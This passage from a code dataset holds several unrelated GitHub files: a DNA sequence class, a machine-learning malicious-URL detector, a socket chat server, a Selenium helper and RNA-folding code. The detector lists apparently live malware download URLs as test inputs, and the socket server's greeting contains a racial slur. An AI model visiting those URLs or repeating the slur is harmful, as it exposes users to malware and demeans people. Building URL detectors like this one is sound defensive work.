false otherwise\n \"\"\"\n try:\n if nucleotide in 'ACTG':\n if index <= len(self.__dna_string):\n self.__dna_string = self.__dna_string[:index] + nucleotide + self.__dna_string[index:]\n if len(self.__dna_string) > 40:\n sq = self.__dna_string[:40] + \"...\" + self.__dna_string[-3:]\n else:\n sq = self.__dna_string\n print(\"[{}] {}: {}\".format(self.__dna_id, self.__dna_name, sq))\n return True\n else:\n raise IndexError\n except IndexError:\n print(\"Index out of range\")\n return False\n except TypeError:\n print(\"Nucleotide should be one of the next chars: A,C,T,G\")\n return False\n\n def assignment(self, new_dna):\n \"\"\"\n changes the dna's data to be the new dna's data\n :param new_dna:\n :return:true if managed, false otherwise and prints a relevant message\n \"\"\"\n try:\n if type(new_dna) is DnaSequence:\n self.__dna_id = new_dna.__dna_id\n self.__dna_name = new_dna.__dna_name\n self.__dna_string = new_dna.__dna_string\n print(\"[{}] {}: {}\".format(self.__dna_id, self.__dna_name, self.__dna_string))\n return True\n else:\n raise TypeError\n except TypeError:\n print(\"New DNA must be a valid DNA\")\n return False\n\n def __str__(self):\n \"\"\"\n :return: dna's info as string\n \"\"\"\n if len(self.__dna_string) > 40:\n sq = self.__dna_string[:40] + \"...\" + self.__dna_string[-3:]\n else:\n sq = self.__dna_string\n return \"DNA id: {}, name: {}, sequence: {}\".format(self.__dna_id, self.__dna_name, sq)\n\n def __eq__(self, other):\n \"\"\"\n overrides == operator\n :param other: to be checked\n :return: true if equal, false otherwise\n \"\"\"\n try:\n return self.__dna_id == other.dna_id and self.__dna_name == other.dna_name and self.__dna_string == other.dna_string\n except TypeError:\n print(\"Please send a valid DNA\")\n return\n\n def __ne__(self, other):\n \"\"\"\n overrides != operator\n :param other: to be checked\n :return: true if not equal, false otherwise\n \"\"\"\n try:\n return self.__dna_id != other.dna_id or self.__dna_name == other.dna_name or self.__dna_string != other.dna_string\n except TypeError:\n print(\"Please send a valid DNA\")\n return\n\n def __getitem__(self, item):\n try:\n return self.__dna_string[item]\n except IndexError:\n print(\"Index out of range\")\n return\n\n def __len__(self):\n \"\"\"\n overrides len()\n :return: the length of the dna's sequence\n \"\"\"\n return len(self.__dna_string)\n","repo_name":"miryamduker/DNA-project","sub_path":"dnaSequence.py","file_name":"dnaSequence.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40412131326","text":"#Adam Karim\r\n#https://web.archive.org/web/20170514093208/http://fsecurify.com/using-machine-learning-detect-malicious-urls/ was used to help me create this code. \r\n# The tutorial explains on how to create a machine learning algorithm on how to detect malicious url\r\n#https://web.archive.org/web/20171206020715if_/https://github.com/faizann24/Using-machine-learning-to-detect-malicious-URLs/tree/master/data \r\n# this was used to provided the clean websites that imported into the MalwareData.csv\r\n\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nimport pandas as pd\r\nimport numpy as np\r\nimport random\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nimport sys\r\nimport os\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\nimport math\r\nfrom collections import Counter\r\n\r\n#Function getExtension is used to seperate the website from extensions such as .com/file.php \r\ndef getExtension(input):\r\n extBySlash = str(input.encode('utf-8')).split('/')\r\n allExt = []\r\n for i in extBySlash:\r\n extensions = str(i).split('-')\r\n extByDot = []\r\n for j in range(0 , len(extensions)):\r\n tempExt = str(extensions[j]).split('.')\r\n extByDot = extByDot + tempExt\r\n allExt = allExt + extensions + extByDot\r\n allExt = list(set(allExt))\r\n if 'com' in allExt:\r\n allExt.remove('com')\r\n return allExt\r\n\r\n#allurlsData store the data frame from MalwareData.csv\r\nallurls = './MalwareData.csv'\r\nallurlscsv = pd.read_csv(allurls,',', error_bad_lines=False)\r\nallurlsData = pd.DataFrame(allurlscsv)\r\n\r\n#print(allurlsData)\r\n#this section of the code shuffles the array so all data is not organized to increase entropy\r\nallurlsData = np.array(allurlsData)\r\nrandom.shuffle(allurlsData)\r\n#print(allurlsData)\r\n\r\n\r\n#Vectorizer is used in machine learning such as numpy to optimize performance and is able to loop through program faster\r\ny = [d[1] for d in allurlsData]\t\r\ncorsL = [d[0] for d in allurlsData]\t\r\nvectorizer = TfidfVectorizer(tokenizer=getExtension)\t\r\nX = vectorizer.fit_transform(corsL) \r\ny = [d[1] for d in allurlsData]\t\r\ncorsL = [d[0] for d in allurlsData]\t\r\nvectorizer = TfidfVectorizer(tokenizer=getExtension)\t\r\nX = vectorizer.fit_transform(corsL) \r\n\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\t\r\n#A logistic regression algorithm is used to help classify whether a url is malicious or not \r\nlgs = LogisticRegression()\t\r\nlgs.fit(X_train, y_train)\r\nprint(lgs.score(X_test, y_test)) \r\n\r\n#THIS BLOCK DETERMINES IF THE WEBSITE IS MALICIOUS OR NOT.\r\nX_predict = ['https://youtube.com/' , 'https://facebook.com/' , 'http://100.35.47.56:18957/.i' , 'vnjt.top/files/penelop/updatewin2.exe' , 'https://www.youtube.com/']\r\nX_predict = vectorizer.transform(X_predict)\r\ny_Predict = lgs.predict(X_predict)\r\nprint(y_Predict) #printing predicted values\r\n","repo_name":"40super/Senior_Project","sub_path":"senior_project/MalwareDetection/Malware_Detection.py","file_name":"Malware_Detection.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9340247980","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Create Time: 2022/02/05 10:00\n# Create User: NB-Dragon\nimport math\n\n\nclass NetworkTrafficHelper(object):\n def get_speed_and_progress(self, mission_dict: dict, time_interval: int):\n \"\"\"\n :param mission_dict:\n Example: {\"mission_uuid\": {\"update_size\": 0, \"current_size\": 0, \"expect_size\": 0}}\n :param time_interval:\n Example: 0\n :return: {\"mission_uuid\": str, \"progress\": str, \"speed\": str}\n \"\"\"\n speed_content_list = []\n for mission_uuid, mission_item in mission_dict.items():\n progress = self._get_progress_description(mission_item[\"current_size\"], mission_item[\"expect_size\"])\n speed = self._get_speed_description(mission_item[\"update_size\"], time_interval)\n mission_item[\"update_size\"] = 0\n result_item = {\"mission_uuid\": mission_uuid, \"progress\": progress, \"speed\": speed}\n speed_content_list.append(result_item)\n return speed_content_list\n\n @staticmethod\n def get_current_finish_size(section_info):\n finish_size = 0\n for value in section_info.values():\n current_progress = value[\"current_progress\"]\n if len(current_progress) == 0:\n finish_size += value[\"section_size\"]\n elif len(current_progress[0]) == 2:\n incomplete_size = sum([item[1] - item[0] + 1 for item in current_progress])\n finish_size += value[\"section_size\"] - incomplete_size\n return finish_size\n\n @staticmethod\n def _get_progress_description(current_size, expect_size):\n return \"{:.2f}%\".format(current_size / expect_size * 100) if expect_size else \"unknown\"\n\n \"\"\"\n Refer link: https://www.electropedia.org/iev/iev.nsf/display?openform&ievref=112-01-27\n \"\"\"\n\n @staticmethod\n def _get_speed_description(update_size, time_interval):\n update_size_per_second = int(update_size // time_interval) if time_interval else 0\n unit_list = [\"bytes\", \"KiB\", \"MiB\", \"GiB\", \"TiB\", \"PiB\", \"EiB\", \"ZiB\", \"YiB\"]\n unit_index = min(8, int(math.log2(update_size_per_second) / 10)) if update_size_per_second else 0\n format_size = update_size_per_second / (1 << unit_index * 10)\n if unit_index > 0:\n return \"{:.2f}{}/s\".format(format_size, unit_list[unit_index])\n else:\n return \"{}{}/s\".format(int(format_size), unit_list[unit_index])\n","repo_name":"NB-Dragon/AdvancedDownloader","sub_path":"network/NetworkTrafficHelper.py","file_name":"NetworkTrafficHelper.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"21"} +{"seq_id":"6829399294","text":"import socket\n\nHOST = '172.18.120.128'\nPORT = 1234\n\nserver_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver_socket.bind((HOST, PORT))\nserver_socket.listen()\n\nprint(\"Server listening on\", HOST, \"port\", PORT)\n\nclient_socket, client_address = server_socket.accept()\nprint(\"Connection from:\", client_address)\n\nmessage = \"Hello, NIGGA!\"\nclient_socket.sendall(message.encode())\n\nwhile True:\n \n received_message = client_socket.recv(1024).decode()\n print(\"Received:\", received_message)\n\n if received_message.lower() == \"bye\":\n response = \"Goodbye!\"\n client_socket.sendall(response.encode())\n break\n\n user_input = input(\"Enter your response: \")\n client_socket.sendall(user_input.encode())\n\nclient_socket.close()\nserver_socket.close()\n","repo_name":"shaheen-senpai/S7DSLAB","sub_path":"Sent Nuclear Codes/ip.py","file_name":"ip.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74296350771","text":"from selenium.webdriver import Chrome\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.firefox import GeckoDriverManager\n\nfrom lib.Logger import log_to_file\nfrom config.TestConstants import TestConstants\nclass SeleniumDriverManager:\n\n browser = TestConstants.BROWSER\n\n def __init__(self):\n log_to_file.debug(\"Inside Selenium driver manager...\")\n self._driver = None\n\n @property\n def driver(self):\n if self._driver is None:\n if SeleniumDriverManager.browser == \"chrome\":\n log_to_file.debug(\"Initializing chrome browser...\")\n self._driver = Chrome(service=Service(ChromeDriverManager().install()))\n self._driver.implicitly_wait(TestConstants.IMPLICIT_TIMEOUT)\n\n elif SeleniumDriverManager.browser == \"firefox\":\n log_to_file.debug(\"Initializing firefox browser...\")\n self._driver = Firefox(service=Service(GeckoDriverManager().install()))\n else:\n log_to_file.debug(\"Initializing of chrome or firefox browser failed...\")\n raise AttributeError(\"Unsupported browser: {}\".format(SeleniumDriverManager.browser))\n return self._driver\n\n\n @property\n def driver_wait(self):\n log_to_file.debug(\"Initializing webdriver wait...\")\n self._driver_wait = WebDriverWait(self.driver, TestConstants.EXPLICIT_TIMEOUT)\n return self._driver_wait\n\n\n\n","repo_name":"gurudattvshenoy/selenium_python","sub_path":"lib/SeleniumDriverManager.py","file_name":"SeleniumDriverManager.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"37486683607","text":"from itertools import combinations\n\n\ndef solution(number, k):\n tmp = []\n for i in number:\n tmp.append(i)\n combi = list(combinations(tmp, len(number) - k))\n\n setting = []\n for com in combi:\n for i, j in enumerate(com):\n if i == 0:\n number = j\n else:\n number += j\n setting.append(number)\n setting = sorted(setting)\n return setting[-1]\n\n## 시간초과뜨는데 다른 방법을 못찾겠음.","repo_name":"DrunkJin/CosMos","sub_path":"220606-220612/p42883/seojin_p42883.py","file_name":"seojin_p42883.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"15351305849","text":"#!/usr/bin/env python\n# coding=future_fstrings\nfrom __future__ import print_function\n\n__license__ = \"MIT\"\n__authors__ = [\"Marvin Jens\"]\n__email__ = \"mjens@mit.edu\"\n\nimport sys\nimport os\nimport logging\nimport copy\nimport time\nimport numpy as np\nimport pickle as pickle\nfrom subprocess import PIPE, Popen\nfrom multiprocessing import Process, Event, JoinableQueue as Queue\nimport multiprocessing\nfrom collections import defaultdict\nfrom RBPamp.caching import CachedBase, cached, pickled\nimport RBPamp.cyska as cyska\nlogger = logging.getLogger(\"fold\")\n\n# This global variable is used by the keyboard interrupt \n# handler to decide if we need to flush stuff to disk\nfolding_in_progress = False\n \nclass RBNSOpenen(CachedBase):\n \"\"\"\n Analogous to RBNSReads, which holds the raw sequences, instances of this class hold \n open-energies for all kmer start-positions inside the raw sequences. \n Since one file with reads produces multiple openen files (one for each k) and\n these furthermore may exist in raw or discretized form, an OpenenStorage instance\n should be used to encapsulate transparent access to the underlying \n files.\n \"\"\"\n def __init__(self, fname, rbns_reads, k, oem=[], disc=None, dummy=False, acc_scale=1., **kwargs):\n\n CachedBase.__init__(self, **kwargs)\n\n self.fname = fname\n self.rbns_reads = rbns_reads\n \n self.k = k\n self.discretized = (\"discretized\" in self.fname)\n self.T = rbns_reads.temp\n self.RT = rbns_reads.RT\n self.acc_scale = acc_scale\n self.logger = logging.getLogger('fold.RBNSOpenen')\n self.missing_data = False\n \n # to be initialized upon first access to oem\n self.include_adapters = None\n self.ofs = 0\n self.dummy = dummy\n \n if self.discretized:\n # recovering discretization scheme from file-name\n self.disc = OpenenDiscretization.from_filename(fname)\n self.dtype = self.disc.dtype\n self.acc_lookup = np.exp(- self.disc.x/self.RT)\n else:\n # we have the raw floating point values\n self.disc = None\n self.dtype = np.float32\n self.acc_lookup = []\n\n if len(oem):\n self.cache_preload(\"oem\", oem)\n N, L = oem.shape\n self.cache_preload(\"N\", N)\n self.cache_preload(\"L\", L)\n self.is_subsample = True\n else:\n self.is_subsample = False\n\n self.logger.debug(\"initialized for data from '{self.fname}' @{self.T} C\".format(self=self))\n \n @classmethod\n def from_array(cls, reads, k, oem, dtype=np.uint8, mode='gamma', **kwargs):\n \n L = oem.shape[1]\n fname = \"discretized_{mode}_L{L}_k{k}_{dtype.__name__}\".format(**locals())\n openen = cls(fname, reads, k, **kwargs)\n openen._do_not_unpickle = True\n openen._do_not_pickle = True\n N, L = oem.shape\n \n openen.cache_preload(\"oem\", oem)\n openen.cache_preload(\"N\", N)\n openen.cache_preload(\"L\", L)\n \n return openen\n \n @property\n def cache_key(self):\n return \"RBNSOpenen({self.rbns_reads.cache_key}) k={self.k} disc={self.disc} nmax={self.rbns_reads.n_max}\".format(self=self)\n\n @property\n @cached\n @pickled\n def N(self):\n N, L = self.oem.shape\n return N\n\n @property\n @cached\n @pickled\n def L(self):\n N, L = self.oem.shape\n return L\n \n def count_records(self, with_adapter=True):\n \"\"\"return the number of complete records based on file-size\"\"\"\n if not os.path.exists(self.fname):\n return 0\n\n l = self.rbns_reads.L - self.k + 1\n if with_adapter:\n l += self.rbns_reads.l5 + self.rbns_reads.l3\n\n itemsize = np.dtype(self.dtype).itemsize\n N_items = os.path.getsize(self.fname) / itemsize\n \n return int(np.floor(N_items / l))\n\n def check_data(self, with_adapter=True):\n if self.count_records(with_adapter=with_adapter) == self.rbns_reads.N:\n return True\n\n @property\n # @cached\n def oem(self):\n \"\"\"\n load and keep all open-energies in memory (optionally discretized)\n \"\"\"\n self.logger.debug(\"loading open energies from {self.fname}\".format(self=self) )\n #oem = np.fromfile(self.fname, dtype=self.dtype)\n N = self.rbns_reads.N\n l = self.rbns_reads.L - self.k + 1\n l_adap = l + self.rbns_reads.l5 + self.rbns_reads.l3\n\n oem = None\n if not os.path.exists(self.fname):\n self.logger.warning(\"file '{}' not found. Assuming accessibility = 1\".format(self.fname))\n self.l_row = l_adap\n self.include_adapters = True\n self.ofs = self.rbns_reads.l5\n self.missing_data = True\n return np.zeros( (N, self.l_row), dtype=self.dtype)\n\n # we need to load from disk\n itemsize = np.dtype(self.dtype).itemsize\n N_items = os.path.getsize(self.fname) / itemsize\n L = N_items / float(N)\n\n self.logger.debug(\"open-energy row l={0}\".format(L))\n if L == l:\n self.logger.info(\"data excludes adapters L={0}\".format(L))\n self.l_row = l\n self.include_adapters = False\n self.ofs = 0\n \n elif L == l_adap:\n self.logger.info(\"data covers adapters L={0}\".format(L))\n self.l_row = l_adap\n self.include_adapters = True\n self.ofs = self.rbns_reads.l5\n\n elif L > l_adap:\n n_file = N_items / l_adap\n if self.rbns_reads.n_max:\n pass\n # it's okay that we truncate!\n else:\n self.logger.warning(\"file contains {n_file} rows (assuming it includes adapters) but only {self.rbns_reads.N} reads are loaded. Truncating!\".format(**locals()) )\n\n self.ofs = self.rbns_reads.l5\n self.include_adapters = True\n self.l_row = l_adap\n else:\n delta = L - ( l + self.rbns_reads.l5 + self.rbns_reads.l3 )\n raise ValueError(\"size of open energy matrix {L} does not match the reads {self.rbns_reads.L} even when accounting for 5' {self.rbns_reads.l5} and 3' {self.rbns_reads.l3} adapters. Delta = {delta}!\".format(**locals()) )\n \n # read the actual data. Only as much as needed!\n import time\n import mmap\n from contextlib import closing\n N_bytes = self.l_row * N * itemsize\n # N_bytes = self.l_adap * N * itemsize\n N_needed = self.l_row * N\n\n t0 = time.time()\n oem = np.memmap(self.fname, dtype=self.dtype, mode='r')[:N_needed]\n # with open(self.fname, 'rb') as f:\n # with closing(mmap.mmap(f.fileno(), length=N_bytes, access=mmap.ACCESS_READ)) as m:\n # oem = np.frombuffer(m, dtype=self.dtype)\n\n dt = 1000. * (time.time() - t0)\n self.logger.debug(\"loading {N} rows of open-energy from {self.fname} took {dt:.2f} ms.\".format(**locals()))\n oem = oem.reshape( (N, self.l_row) )\n return oem\n \n @property\n # @cached\n def acc(self):\n if self.dummy:\n return np.ones(self.oem.shape, dtype=np.float32)\n\n if not self.discretized:\n return np.exp(-self.oem*self.acc_scale/self.RT)\n else:\n return self.acc_lookup[self.oem]\n \n def discretize(self, disc=None, dname=None):\n \n if not disc:\n disc = OpenenDiscretization.from_filename(dname)\n\n self.logger.debug(\"discretizing {0} using {1}\".format(self.fname, disc.to_filename(N=self.rbns_reads.N)) )\n t0 = time.time()\n \n d_oem = disc.discretize(self.oem)\n if not dname:\n path, fname = os.path.split(self.fname)\n dname = os.path.join(path, \"{0}.{1}\".format(disc.to_filename(N=self.rbns_reads.N), fname) )\n\n doe = RBNSOpenen(\n dname,\n self.rbns_reads,\n self.k,\n oem = d_oem,\n )\n doe.include_adapters = self.include_adapters\n doe.ofs = self.ofs\n \n dt = time.time() - t0\n self.logger.debug(\"discretization took {0:.1f} seconds\".format(dt) )\n return doe\n \n def integrate(self, integrand, bin_weights):\n assert self.discretized\n return np.trapz(integrand * bin_weights, self.disc.x)\n\n @cached\n @pickled\n def kmer_openen_counts(self):\n return cyska.kmer_openen_counts(self.rbns_reads.seqm, self.oem, self.k)\n \n @cached\n #@pickled\n def get_kmer_openen_profile(self, kmer):\n kmer_index = cyska.seq_to_index(kmer)\n k_seq = len(kmer)\n return cyska.kmer_openen_profile(self.rbns_reads.get_index_matrix(k_seq), self.oem, k_seq, kmer_index, self.k, self.ofs)\n \n #@cached\n #@pickled\n def kmer_mean_openen_profiles(self, k_seq=None):\n self.logger.debug(\"computing kmer_mean_openen_profiles...\" )\n \n if k_seq == None:\n k_seq = self.k\n\n seqm = self.rbns_reads.seqm\n oem = self.oem\n\n t0 = time.time()\n res = cyska.kmer_mean_openen_profiles(seqm, oem, np.array(self.disc.x), k_seq, self.k, self.ofs)\n dt = time.time() - t0\n self.logger.debug(\"kmer_mean_openen_profiles took {0:.1f} seconds\".format(dt) )\n\n return res\n\n def store(self):\n self.logger.info(\"storing open-energies as '{0}'\".format(self.fname) )\n self.oem.tofile(self.fname)\n\n\n\n\nclass ViennaOpenen(object):\n \"\"\"\n Wrapper around an RNAplfold_RBPamp (modified RNAplfold) subprocess.\n \"\"\"\n def __init__(self, k_min=3, k_max=8, temp=22., adap5=\"gggaguucuacaguccgacgauc\", adap3=\"uggaauucucgggugucaagg\", vienna_bin=\"RNAplfold_RBPamp\", l_insert=20, skip_adap=False, **kwargs):\n \n L = len(adap5) + l_insert + len(adap3)\n self.logger = logging.getLogger('fold.ViennaOpenen')\n \n # create the folding sub-process\n cmd=[vienna_bin, \"-O\", \"-u {0}\".format(k_max), \"-W {0}\".format(L), \"-L {0}\".format(L), \"-T {0}\".format(temp)]\n self.cmd = \" \".join(cmd)\n try:\n self.p = Popen(\n cmd, \n stdin=PIPE, \n stdout=PIPE, \n bufsize=1, \n close_fds=True\n )\n except FileNotFoundError:\n self.logger.error(f\"Can not start the RNAplfold binary '{vienna_bin}'\")\n sys.exit(1)\n \n # prepare constant variables needed in batch-processing\n self.k_indices = np.arange(k_min, k_max+1)\n \n # which part of the sequence we are actually interested in\n self.first = 0\n self.last = L\n \n if skip_adap:\n self.first = len(adap5)\n self.last = L - len(adap3)\n\n self.l_insert = self.last - self.first\n self.krange = np.arange(k_min, k_max+1)\n self.k_min = k_min\n self.k_max = k_max\n \n self.adap5 = adap5\n self.adap3 = adap3\n \n self.n_total = 0\n self.logger.info(\"initialized for adap5='{self.adap5}' adap3='{self.adap3}' l_insert = {self.l_insert} k_min={self.k_min} k_max={self.k_max} first={self.first} last={self.last}\".format(self=self) )\n\n def process_sequences(self, seq_src):\n \"\"\"\n Generator that folds the sequences from seq_src and yields (krange, data)\n tuples for each sequence.\n krange is range(self.k_min, self.k_max+1) as specified in __init__ and\n data[k][i] is the open-energy for window of size k starting at position i (zero-based).\n \n Can be called multiple times. The subprocess will not be closed unless close() is called.\n \"\"\"\n n = 0\n for seq in seq_src:\n S = self.adap5 + seq.rstrip() + self.adap3\n l = len(S)\n #print \"folding\", S, len(S)\n self.p.stdin.write(\"{0}\\n\".format(S).encode('ascii'))\n self.p.stdin.flush()\n \n data = [ np.zeros(self.l_insert - k + 1, dtype=np.float32) for k in self.krange ]\n for i in range(l+2):\n j = i - 2\n line = self.p.stdout.readline()\n \n if j < self.first:\n continue\n \n if j >= self.last:\n continue\n \n cols = line.split(b'\\t')\n # print(cols)\n for k in self.krange:\n if j >= (k-1):\n data[k - self.k_min][j-k-self.first+1] = float(cols[k])\n\n yield self.krange, data\n n += 1\n\n #self.logger.debug('folded {0} sequences'.format(n))\n self.n_total += n\n \n\n def close(self):\n \"\"\"\n Close subprocess file-descriptors and wait for clean exit.\n \"\"\"\n self.p.stdin.close()\n self.p.stdin.close()\n ex = self.p.wait()\n self.logger.debug('close(): {0} exited with code {1} after folding {2} sequences'.format(self.cmd, ex, self.n_total) )\n \nclass DummySink(object):\n def __init__(self, fname):\n self.fname = fname\n self.bytes_written = 0\n self.bytes_found = 0\n\n def write(self, *argcs, **kwargs):\n pass\n\n def close(self):\n pass\n\nclass FileSink(object):\n def __init__(self, fname, bytes_keep=0):\n self.fname = fname\n self.f = open(fname, 'ab+')\n logger = logging.getLogger(\"fold.FileSink\")\n logger.warning(f'opened file {fname} in mode ab+')\n\n if bytes_keep:\n # print \"keeping {} bytes\".format(bytes_keep)\n self.f.seek(bytes_keep)\n self.f.truncate()\n\n self.bytes_written = 0\n self.bytes_found = bytes_keep\n \n def write(self, *argcs, **kwargs):\n self.f.write(*argcs, **kwargs)\n self.bytes_written += len(argcs[0])\n\n def close(self):\n self.f.flush()\n self.f.close()\n # print \"expected file-size\", self.fname, self.bytes_written + self.bytes_found, os.path.getsize(self.fname)\n \n\nclass OpenenStorage(CachedBase):\n def __init__(self, reads, path='./', discretize=False, raw_dtype=np.float32, disc_dtype=np.uint8, disc_mode='gamma', dummy=False, T=22., **kwargs):\n \n CachedBase.__init__(self)\n \n self.path = path\n self.reads = reads\n self.raw_dtype = raw_dtype\n self.disc_dtype = disc_dtype\n self.disc_mode = disc_mode\n self.T = T\n self.k_sinks = {}\n self.k_disc = {}\n self.logger = logging.getLogger('fold.OpenenStorage({self.reads.name})'.format(self=self))\n self.n_sets = 0\n self.discretize = discretize\n self.dummy = dummy\n self.kwargs = kwargs\n if dummy:\n self.write = self.dummy_write\n\n @property\n def cache_key(self):\n return \"OpenenStorage({})\".format(self.reads.cache_key)\n\n @cached\n def get_raw(self, k):\n return RBNSOpenen(self._make_filename(k), self.reads, k, dummy=self.dummy, **self.kwargs)\n \n @cached\n def get_discretized(self, k, disc_mode = ''):\n if not disc_mode:\n disc_mode = self.disc_mode\n \n disc = OpenenDiscretization(k, self.reads.L, self.disc_dtype, mode=disc_mode)\n self.k_disc[k] = disc\n fname_disc = self._make_filename(k, disc=disc)\n # print fname_disc\n if os.path.exists(fname_disc):\n return RBNSOpenen(fname_disc, self.reads, k, dummy=self.dummy)\n else:\n raw = self.get_raw(k)\n self.logger.info(\"discretizing '{0}' to satisfy get_discretized({1}) request\".format(raw.fname, k) )\n discretized = raw.discretize(disc=disc, dname=fname_disc)\n discretized.store()\n\n return discretized\n \n def _make_filename(self, k, disc=None):\n if disc:\n #self.k_disc[k] = OpenenDiscretization(k, self.reads.L, self.dtype)\n fmt = disc.to_filename(N=self.reads.N)\n else:\n fmt = \"raw_L{0}_k{1}_{2}\".format(self.reads.L, k, self.raw_dtype.__name__)\n\n base, ext = os.path.splitext(os.path.basename(self.reads.fname))\n fname = os.path.join(self.path, \"{0}.{1}.bin\".format(base, fmt) )\n \n return fname\n\n def _record_raw_bytes(self, k, with_adapter=True):\n itemsize = np.dtype(self.raw_dtype).itemsize\n l = self.reads.L - k + 1\n if with_adapter:\n l += self.reads.l5 + self.reads.l3\n\n return l * itemsize\n\n def has_data(self, k, with_adapter=True):\n fname = self._make_filename(k)\n openen = self.get_raw(k, _do_not_cache=True)\n return openen.check_data(with_adapter=with_adapter)\n\n def has_data_range(self, kmin, kmax):\n yes = True\n for k in range(kmin, kmax+1):\n if not self.has_data(k):\n yes = False\n break\n\n return yes\n\n def count_complete_records_range(self, kmin, kmax, with_adapter=True):\n n = self.reads.N\n for k in range(kmin, kmax+1):\n fname = self._make_filename(k)\n openen = self.get_raw(k, _do_not_cache=True)\n nk = openen.count_records(with_adapter=with_adapter)\n # print fname, nk\n n = min(n, nk)\n \n return n\n\n\n def get_or_create(self, k, records_present=0):\n ### TODO: Add resume suppport by giving expected total number of records nd number of\n ### records to be skipped (both need to be determined prior to folding)\n if not k in self.k_sinks:\n fname = self._make_filename(k)\n self.logger.debug(f\"get_or_create({k}) -> {fname}\")\n if self.has_data(k):\n self.logger.info(\"data for '{}' already in place. Will leave '{}' untouched.\".format(k, fname))\n self.k_sinks[k] = DummySink(fname)\n\n else:\n bytes_keep = self._record_raw_bytes(k) * records_present\n sink = FileSink(fname, bytes_keep = bytes_keep)\n self.k_sinks[k] = sink\n self.logger.info(\"prepared '{0}'\".format(fname))\n \n return self.k_sinks[k]\n \n def prepare_sinks(self, kmin, kmax, n_complete=0):\n self.logger.info(\"preparing sinks to resume after {} records\".format(n_complete))\n for k in range(kmin, kmax+1):\n sink = self.get_or_create(k, n_complete)\n\n def write(self, k, vec):\n sink = self.get_or_create(k)\n if self.discretize:\n vec = self.k_disc[k].discretize(vec)\n\n sink.write(vec.tobytes())\n\n def dummy_write(self, k, vec):\n print(\"writing\", k, vec)\n\n def write_set(self, krange, data):\n for k, vec in zip(krange, data):\n self.write(k, vec)\n self.n_sets += 1\n \n def close(self):\n for sink in list(self.k_sinks.values()):\n sink.close()\n \n self.logger.info(\"closed all files after writing {0} data sets\".format(self.n_sets) )\n\n\n # def fix_skipped_reads(self, krange):\n # keep = []\n # for i, line in enumerate(file(self.reads.fname,'r')):\n # if 'N' in line.upper():\n # keep.append(False)\n # else:\n # keep.append(True)\n \n # keep = np.array(keep, dtype=bool)\n\n # n_skip = (keep == False).sum()\n # print \"rows to drop\", n_skip\n \n # n_reads = self.reads.N\n \n # def fixit(openen):\n # openen._do_not_unpickle = True\n # print \"checking\", openen.fname\n # if openen.N - n_skip == n_reads:\n # print \"removing extra rows!\"\n # oem = openen.oem[keep]\n # assert len(oem) == n_reads\n \n # new = RBNSOpenen(openen.fname, self.reads, k, oem = oem, disc=openen.disc)\n # new.debug_caching = True\n # new._do_not_unpickle = True\n # assert len(new.oem) == n_reads\n # assert new.N == n_reads\n # new.store()\n \n # check = RBNSOpenen(openen.fname, self.reads, k, oem = oem, disc=openen.disc, _do_not_unpickle=True)\n # assert len(check.oem) == n_reads\n # assert check.N == n_reads\n \n # else:\n # print \"File is already correct!\"\n \n # for k in krange:\n # try:\n # fixit(self.get_raw(k))\n # except IOError:\n # pass\n \n # try:\n # fixit(self.get_discretized(k))\n # except IOError:\n # pass\n \n # self.cache_flush()\n\nclass OpenenDiscretization(object):\n \"\"\"\n To save space and time, open-energy values are discretized. This class offers the tools\n to determine optimal bins, discretize floating point raw values, and convert \n (approximately) back.\n \"\"\"\n \n # parameters of the gamma distribution that best approximate the k-mer open energy\n # distribution observed for a sample of real RBNS input reads of length L. \n # key is (L, k)\n opt_gamma_params = {\n (20,3) : (0.81302029638841211, -4.8516107653608754e-11, 1.6349961361376417),\n (20,4) : (0.76963400095617862, 5.0499197572751555e-12, 2.4086755693934219),\n (20,5) : (0.94430616311716076, -5.4020522985407265e-08, 3.1066652289455501),\n (20,6) : (1.3817737299304014, -0.064612855898649235, 2.4524518251440384),\n (20,7) : (2.2979596639625823, -0.41897928143131891, 1.8285816311839422),\n (20,8) : (3.3450059235858616, -0.88683930998285865, 1.5279577374464515),\n\n (40,1) : (0.56359570197492048, -5.8776308767500606e-30, 0.86206668592641167),\n (40,3) : (1.0628281681967706, -6.8214607159662128e-05, 1.2402078509734689),\n (40,4) : (1.2674929471836962, -0.0020650480683494271, 1.2929616570525289),\n (40,5) : (1.4888004568584394, -0.0081636662031228657, 1.3237981203329996),\n (40,6) : (1.7285627206360989, -0.021580429627936448, 1.3376752736147013),\n (40,7) : (2.0032560511697439, -0.046740618049563296, 1.3323232531823281),\n (40,8) : (2.2847020288586801, -0.086073860842223043, 1.3242768850690814),\n }\n\n opt_E_max = {\n (20,1) : 6.,\n (20,2) : 6.5,\n (20,3) : 7.,\n (20,4) : 8.,\n (20,5) : 10.,\n (20,6) : 10.,\n (20,7) : 10.,\n (20,8) : 11.,\n (20,9) : 12.,\n (20,10) : 13.,\n (20,11) : 14.,\n (40,1) : 3.,\n (40,2) : 4.,\n (40,3) : 6.,\n (40,4) : 8.,\n (40,5) : 9.,\n (40,6) : 10.,\n (40,7) : 11.,\n (40,8) : 12.,\n }\n def __init__(self, k, L, dtype=np.uint8, mode='gamma', N=0):\n self.n = 